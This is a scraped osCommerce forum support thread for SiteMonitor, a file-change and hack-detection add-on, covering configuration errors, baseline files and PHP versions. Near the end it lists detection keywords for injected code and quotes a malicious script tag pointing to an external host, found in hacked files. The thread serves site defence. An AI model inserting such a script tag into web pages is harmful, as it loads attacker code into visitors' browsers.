Jump to content
Jack_mcs

SiteMonitor

Recommended Posts

I did scan the support thread, and all of oscommerce support, and googled it. I couldn't find the answer anywhere. I do appreciate that your comment means that the answer is here somewhere so I looked again. But still couldn't find it. Is there any chance you could point me at the answer?

 

I did find one posting in this support thread to do with user name but the error message they got was very different to mine, and I did not see how the answer fitted in with my problem. My error message is:

 

"Your username is invalid. Please change it and try again.: System -> /var/www/html/shop/ - SiteMonitor -> /home/username/public_html/"

 

Your indulgence on this would be hugely appreciated.

Hmm, are you saying you can't see the post just two above your last one or the one at the top of the last page with very large letters? I don't know how else to answer the question but let me try again in another way:

 

1 - Your username is invalid - this means the username entered in the SiteMonitor settings is not any good

 

2 - Please change it and try again - this means to change the username in the SiteMonitor settings and to click update

 

3 - System -> /var/www/html/shop/ - this shows what your shops setting is

 

4 - SiteMonitor -> /home/username/public_html/ - this shows what your SiteMonitor setting is

 

Now, since the shops configure setting is different than what is in the SiteMonitor configure setting (item 3 not equal to item 4), an error occurs (item 1). When an error occurs, in any part of the shop, you have to make some change to fix it. The way to know what change is provided by the second line (item 2). I hope this provides a clue as to what is needed.

Share this post


Link to post
Share on other sites

If you read my response properly you would have noticed that I did mention seeing the post. I like the previous poster, did not understand you reply. Interestingly if I knew the answer to my question I would not have posted a question.

 

Your rude put downs are not necessarily the best way to help people, and perhaps you should find someone with the right mind set to do that for you.

 

When I was in charge of technical support many years ago we had some very simple policies in place:

 

1) Cater for the lowest common denominator.

2) Do not blame users for being stupid or for asking stupid questions.

3) If a question is asked more than once, put an answer in the FAQ.

4) Refer all questions to the FAQ when appropriate.

5) Never criticise people for not reading the FAQ? Why bother? What is to gain, other than to upset people. It is just rude!

6) If someone asks for help, give them help if you can, but never blame them for needing help.

7) Design software so that help is never needed (this is just an aim but worth striving for nonetheless).

8) Design error messages so they give guidance about getting rid of the error.

 

You mention in your latest reply to change the username. In the SiteMonitor Config page it says the username is only used for curl. User's without curl would understandably assume that the username could be ignored. Which seems to be the case as this username has no affect on my problem. It is actually the two conflicting path names that are the problem not the user name. Therefore the error message about an invalid user name is wrong, or misleading at best.

 

If I ever get your contribution to work I am sure it will be hugely useful and I am certainly very grateful to you for making it available.

 

Bill

 

Hmm, are you saying you can't see the post just two above your last one or the one at the top of the last page with very large letters? I don't know how else to answer the question but let me try again in another way:

 

1 - Your username is invalid - this means the username entered in the SiteMonitor settings is not any good

 

2 - Please change it and try again - this means to change the username in the SiteMonitor settings and to click update

 

3 - System -> /var/www/html/shop/ - this shows what your shops setting is

 

4 - SiteMonitor -> /home/username/public_html/ - this shows what your SiteMonitor setting is

 

Now, since the shops configure setting is different than what is in the SiteMonitor configure setting (item 3 not equal to item 4), an error occurs (item 1). When an error occurs, in any part of the shop, you have to make some change to fix it. The way to know what change is provided by the second line (item 2). I hope this provides a clue as to what is needed.

Share this post


Link to post
Share on other sites

Your rude put downs are not necessarily the best way to help people, and perhaps you should find someone with the right mind set to do that for you.

That was not my intention. If you go back through the this thread, you will see that this same question get askes on practically every page. My response was as an attempt to make it easier for future posters to find and understand the error. You stated, "couldn't find the answer anywhere." Others have state the same. My last post should make that claim impossible in the future. That was its purpose. I don't mind trying to help, as evidenced by my posts throughout the forum. Helping with the same problem many times is aggravating but I still do it. Helpng with the same problem page after page when it has been clearly addressed before begins to grate a bit.

 

When I was in charge of technical support many years ago we had some very simple policies in place:

 

1) Cater for the lowest common denominator.

2) Do not blame users for being stupid or for asking stupid questions.

You misread my intention. I make as many mistakes as the next guy - probably more so on average - and can be quote slow on understanding new things. I wouldn't consider criticizing for not being able to understand something. I do apologize if you took it that way. It is not how I meant it.

 

You mention in your latest reply to change the username. In the SiteMonitor Config page it says the username is only used for curl. User's without curl would understandably assume that the username could be ignored. Which seems to be the case as this username has no affect on my problem. It is actually the two conflicting path names that are the problem not the user name. Therefore the error message about an invalid user name is wrong, or misleading at best.

 

It's actually the username in the path that is the problem. I never considered that people were getting confused by the username of the curl option. That's a good point and I will make a change in the version to account for it.

If I ever get your contribution to work I am sure it will be hugely useful and I am certainly very grateful to you for making it available.

If you copy/paste the system path in the error into the start directory, it should work.

Share this post


Link to post
Share on other sites

I have managed to cure the username problem and I can now get to the Admin part of SiteMonitor. I am now confused about how to do an 'update' in such a way that it creates a baseline from which to check for any changes in the future. Every time I run an update it just lists all the files on my site. I realise I am doing something wrong so I will search the support forum before posting a question re this :)

 

I do understand just how frustrating and irritating it can be to answer the same questions over and over. That's why I find FAQs so useful. You should know though that your hard work is greatly appreciated.

 

Bill

 

That was not my intention. If you go back through the this thread, you will see that this same question get askes on practically every page. My response was as an attempt to make it easier for future posters to find and understand the error. You stated, "couldn't find the answer anywhere." Others have state the same. My last post should make that claim impossible in the future. That was its purpose. I don't mind trying to help, as evidenced by my posts throughout the forum. Helping with the same problem many times is aggravating but I still do it. Helpng with the same problem page after page when it has been clearly addressed before begins to grate a bit.You misread my intention. I make as many mistakes as the next guy - probably more so on average - and can be quote slow on understanding new things. I wouldn't consider criticizing for not being able to understand something. I do apologize if you took it that way. It is not how I meant it.It's actually the username in the path that is the problem. I never considered that people were getting confused by the username of the curl option. That's a good point and I will make a change in the version to account for it.

If you copy/paste the system path in the error into the start directory, it should work.

Share this post


Link to post
Share on other sites

I have managed to cure the username problem and I can now get to the Admin part of SiteMonitor. I am now confused about how to do an 'update' in such a way that it creates a baseline from which to check for any changes in the future. Every time I run an update it just lists all the files on my site. I realise I am doing something wrong so I will search the support forum before posting a question re this :)

 

I do understand just how frustrating and irritating it can be to answer the same questions over and over. That's why I find FAQs so useful. You should know though that your hard work is greatly appreciated.

 

Bill

If you click the TOP update button, the first time it will list all files as it creates the baseline. The second time it should not list anything. If it does then you may have a permissions problem preventing Site Monitor from writing the reference file.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Hi, Jack,

 

When I click "admin" of the site monitor, I got the following messages:ERROR_IMAGES_NOT_PROTECTED and TEXT_MISSING_VERSION_CHECKER

 

Could you please tell me how to fix?

 

Thanks!

Share this post


Link to post
Share on other sites

Hi, Jack,

 

When I click "admin" of the site monitor, I got the following messages:ERROR_IMAGES_NOT_PROTECTED and TEXT_MISSING_VERSION_CHECKER

 

Could you please tell me how to fix?

When there are capital letters like that in an error, it almost always means there is something missing from the installation. Be sure all of the files have been uploaded, specifically the language files and, if they were uploaded, that they were uploaded to your admin directory,

Share this post


Link to post
Share on other sites

When there are capital letters like that in an error, it almost always means there is something missing from the installation. Be sure all of the files have been uploaded, specifically the language files and, if they were uploaded, that they were uploaded to your admin directory,

Share this post


Link to post
Share on other sites

Yes--I really missed 2 files in the english folder. I added them and now the monitor works fine. Thanks a lot. The only issue I got is a warning when I opened the monitor:

WARNING: Your images directory is not protected by a .htaccess file.

Share this post


Link to post
Share on other sites

Yes--I really missed 2 files in the english folder. I added them and now the monitor works fine. Thanks a lot. The only issue I got is a warning when I opened the monitor:

WARNING: Your images directory is not protected by a .htaccess file.

The images problem was discussed in the last few pages.

Share this post


Link to post
Share on other sites

Hi, I hope somebody can help me.

 

It doesn't seem to read the actual status correctly. In my report I get Total mismatches found were 3456, Total files being monitored is 1150

Apart from correctly reporting NewFiles and DeletedFiles, All the rest of the files seem to be reported under Mismatches, for example (only picking 1 object, there are loads):

 

SIZE MISMATCH:

Difference found: New-> t/modules/payment/chronopay/callback.php Original-> 2844

 

 

TIME MISMATCH:

Time Mismatch on t/modules/payment/chronopay/callback.php Last Changed on Thursday, 01 Jan 1970 00:00:00 GMT

 

 

PERMISSIONS MISMATCH:

permissions Mismatch on t/modules/payment/chronopay/callback.php Currently set to 0 was set to 644

 

 

And looking in the reference file for this particular object:

.ext/modules/payment/chronopay/callback.php,2844,1291744380,644

 

 

What can i do?

Share this post


Link to post
Share on other sites

Hi, I hope somebody can help me.

 

It doesn't seem to read the actual status correctly. In my report I get Total mismatches found were 3456, Total files being monitored is 1150

Apart from correctly reporting NewFiles and DeletedFiles, All the rest of the files seem to be reported under Mismatches, for example (only picking 1 object, there are loads):

If all of the files are reporting a mismatch, then it may be due to the php code used to find that. The code should work for all versions of php but maybe your version has some bug in it. I would first try to narrow it down though by excluding all directories so that the check is only done on the root directory. Then recreate the refernce file and see if it fails on those. If it does, inspect those files to be sure they are all named correctly. That is, if you have a file named "myfile.php _original," SiteMonitor will fail on it so that file should be deleted or moved to a hidden directory. If it still fails after that, all I can suggest is that you ask your host to upgrade your php version, assuming it is an older versions.

Share this post


Link to post
Share on other sites

If all of the files are reporting a mismatch, then it may be due to the php code used to find that. The code should work for all versions of php but maybe your version has some bug in it. I would first try to narrow it down though by excluding all directories so that the check is only done on the root directory. Then recreate the refernce file and see if it fails on those. If it does, inspect those files to be sure they are all named correctly. That is, if you have a file named "myfile.php _original," SiteMonitor will fail on it so that file should be deleted or moved to a hidden directory. If it still fails after that, all I can suggest is that you ask your host to upgrade your php version, assuming it is an older versions.

 

Hi Jack_mcs,

 

I did as you suggested and now it's reporting all of the rootfiles as mismatches (which makes sense in my case, that's what it did before as well).

 

If I look in the referencefile, all names start with a period (.), is that supposed to be like that? And in the logfile, it only displays half the name, is that normal?

Like:

Difference found: New-> eckout_payment_address.php Original-> 21038

Reference:

.checkout_payment_address.php,21038,1291744644,644

 

If I remove the first period of each file, it is marked as a new file and no further mismatch is reported:

Found a new file named eckout_payment_address.php

 

BTW, the php version of my host is: 4.4.9

Should that be good enough?

Share this post


Link to post
Share on other sites

Hi Jack_mcs,

 

I did as you suggested and now it's reporting all of the rootfiles as mismatches (which makes sense in my case, that's what it did before as well).

 

If I look in the referencefile, all names start with a period (.), is that supposed to be like that? And in the logfile, it only displays half the name, is that normal?

Like:

Difference found: New-> eckout_payment_address.php Original-> 21038

Reference:

.checkout_payment_address.php,21038,1291744644,644

 

If I remove the first period of each file, it is marked as a new file and no further mismatch is reported:

Found a new file named eckout_payment_address.php

 

BTW, the php version of my host is: 4.4.9

Should that be good enough?

Files that begin with a period are hidden files. Those files shouldn't be causing a failure but without actually being able to see what is going on, I can't really say. But, in general, I'm not a big fan of using the root directory for storage. If you have an old file you want to keep on the server, create a directory named .storage (notice the period) and move all of those files to it. Then exclude that directory in SiteMonitor. As for the non-hidden files though, there should be a checkout_payment_address.php file (without the period) in the root or your shop won't function correctly so you should verify that is the case.

 

The code should run fine with your version of php. Although sometimes there are versions with bugs so that it might work with 4.4.8 and 4.4.10 but not 4.4.9. I don't have any way to say if that is the case here but it is always a possibility. Regardless though, you should request that your host upgrade to version 5 since version 4 is no longer supported.

Share this post


Link to post
Share on other sites

BTW, the php version of my host is: 4.4.9

Should that be good enough?

 

I would just like to say at this point that my host is also on 4.4.9 and I am able to run SiteMonitor without any problems. I did have an error 500 internal server error to start with, but I later discovered this was because the script was timing out, as once I had added the admin folder to the excludes list, the error stopped.

Share this post


Link to post
Share on other sites

Files that begin with a period are hidden files. Those files shouldn't be causing a failure but without actually being able to see what is going on, I can't really say. But, in general, I'm not a big fan of using the root directory for storage. If you have an old file you want to keep on the server, create a directory named .storage (notice the period) and move all of those files to it. Then exclude that directory in SiteMonitor. As for the non-hidden files though, there should be a checkout_payment_address.php file (without the period) in the root or your shop won't function correctly so you should verify that is the case.

 

Hi Guys, thanks for responding.

 

So, first of all, the leading period is not on the file itself (except for .htaccess of course), but only mentioned as such in the reference.php file. So, for every file on my domain, the file is referenced in the reference file starting with a period. Hence, the file checkout_payment_address.php is mentioned in the reference file as .checkout_payment_address.php

Might that be the reason for my failures?

 

Secondly, I don't understand exactly what you mean by 'using the root directory for storage'? I don't as far as I know. I just set up a normal shop and these 49 files in the root, are the normal files mostly mentioned under 'catalog'...

Share this post


Link to post
Share on other sites

So, first of all, the leading period is not on the file itself (except for .htaccess of course), but only mentioned as such in the reference.php file. So, for every file on my domain, the file is referenced in the reference file starting with a period. Hence, the file checkout_payment_address.php is mentioned in the reference file as .checkout_payment_address.php

Might that be the reason for my failures?

 

Secondly, I don't understand exactly what you mean by 'using the root directory for storage'? I don't as far as I know. I just set up a normal shop and these 49 files in the root, are the normal files mostly mentioned under 'catalog'...

If you don't actually have hidden files on the server then I don't know what it could be. There's nothing in the code to change the file name like that. It can appear to happen if the file names are invalid, like "my file.php," but you say you don't have such files so I don't know what it is. I mentioned the storage because if looked like you had hidden files there. If you don't, then that doesn't apply.

Share this post


Link to post
Share on other sites

If you don't actually have hidden files on the server then I don't know what it could be. There's nothing in the code to change the file name like that. It can appear to happen if the file names are invalid, like "my file.php," but you say you don't have such files so I don't know what it is. I mentioned the storage because if looked like you had hidden files there. If you don't, then that doesn't apply.

 

 

I really have no clue. If I run the site locally (on uniformserver) than it runs OK, no mismatches at all. But online it seems to every file is a mismatch.

I installed most of the recommended security addons (SecurityPro, IP trap, htaccess protection, Anti XSS), so perhaps something is interfering there, but then again, it would do so locally offline as well right?

So, perhaps like you, it might be the PHP version. The local one on uniform server is version 5.2.8

But then again, PeterM mentioned that he is running the same 4.4.9 version without a problem.

 

Any hints how to start troubleshooting?

Share this post


Link to post
Share on other sites

I really have no clue. If I run the site locally (on uniformserver) than it runs OK, no mismatches at all. But online it seems to every file is a mismatch.

I installed most of the recommended security addons (SecurityPro, IP trap, htaccess protection, Anti XSS), so perhaps something is interfering there, but then again, it would do so locally offline as well right?

So, perhaps like you, it might be the PHP version. The local one on uniform server is version 5.2.8

But then again, PeterM mentioned that he is running the same 4.4.9 version without a problem.

 

Any hints how to start troubleshooting?

Other than what has been mentioned, no. This appears to be one of those problems not solvable via a support thread.

Share this post


Link to post
Share on other sites

I really have no clue. If I run the site locally (on uniformserver) than it runs OK, no mismatches at all. But online it seems to every file is a mismatch.

I installed most of the recommended security addons (SecurityPro, IP trap, htaccess protection, Anti XSS), so perhaps something is interfering there, but then again, it would do so locally offline as well right?

So, perhaps like you, it might be the PHP version. The local one on uniform server is version 5.2.8

But then again, PeterM mentioned that he is running the same 4.4.9 version without a problem.

 

Any hints how to start troubleshooting?

 

BTW, I just found out that I can change the PHP version from my hosting myself. From 4 to 5 (or even 6). I am running websites for multiple companies, but most of them being HTML based. Would you think it is worth the risk to switch to PHP 5 for this oscommerce site?

Share this post


Link to post
Share on other sites

BTW, I just found out that I can change the PHP version from my hosting myself. From 4 to 5 (or even 6). I am running websites for multiple companies, but most of them being HTML based. Would you think it is worth the risk to switch to PHP 5 for this oscommerce site?

Yes, php 5 is more secure. However, upgrading to it might cause some coding problesm to appear, especially if you go to 5.3 or above. They can be fixed but you need to be prepared for them.

Edited by Jack_mcs

Share this post


Link to post
Share on other sites

Hi guys !

 

thanks for this really useful contribution. I am installing it but at the last steps something strange happens : I get easily to the configuration step but when I open the congif on my admin and try tu update I get this message :

 

Warning: opendir(/home/username/public_html/shop/) [function.opendir]: failed to open dir: No such file or directory in /home/(myusername)/public_html/shop/admin/includes/functions/sitemonitor_functions.php on line 392

 

 

 

Can you help ?

 

many thanks !

 

florence

Share this post


Link to post
Share on other sites

Jack

 

Interesting one here.

 

If I set my Hacker code to

 

'error_reporting(0)', 'base64_decode', '<frame','gzdecode', 'eval',  'Meher Assel', '<iframe src=', '<script src=', 'ob_start("security_update")'

 

I get

 

Checked 129 directories containing a total of 899 files. Skipped 524 files. 18 suspected hacked files found. 

 

I change the hacker code to

 

'error_reporting(0)', 'base64_decode', '<frame','gzdecode', 'eval',  'Meher Assel', '<iframe src=', '<script src=', 'ob_start("security_update")', 'nt02'

 

and get this

 

Checked 129 directories containing a total of 899 files. Skipped 524 files. 48 suspected hacked files found. 

 

The text it is detecting is

 

<script src="http://nt02.co.in/3"></script></body>

 

Can you see why '<script src=' is not flagging those lines?

 

Cheers

 

G

 

EDIT:

 

Have just remove "<" and ", 'nto2' and they were flagged.

 

Now to add ", 'nt02' " back in.

 

G

 

EDIT:

 

Suspect "<" breaks the search, are there other characters that do the same?

 

HTH

 

G

Edited by geoffreywalton

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Share this post


Link to post
Share on other sites

thanks for this really useful contribution. I am installing it but at the last steps something strange happens : I get easily to the configuration step but when I open the congif on my admin and try tu update I get this message :

 

Warning: opendir(/home/username/public_html/shop/) [function.opendir]: failed to open dir: No such file or directory in /home/(myusername)/public_html/shop/admin/includes/functions/sitemonitor_functions.php on line 392

See the colorful reply on the previous page.

Edited by Jack_mcs

Share this post


Link to post
Share on other sites

'error_reporting(0)', 'base64_decode', '<frame','gzdecode', 'eval',  'Meher Assel', '<iframe src=', '<script src=', 'ob_start("security_update")', 'nt02'

 

The text it is detecting is

 

<script src="http://nt02.co.in/3"></script></body>

 

Can you see why '<script src=' is not flagging those lines?

I entered the above in my test shop here and the line was found correctly, as is. For the test file, I just copied an existing php file and pasted the script line near the top. Maybe the file you are using with that code is a different type or the location of the bad code is somewhere else in it. That shouldn't make a difference but is I can't think of any other reason why mine works and yours doesn't.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×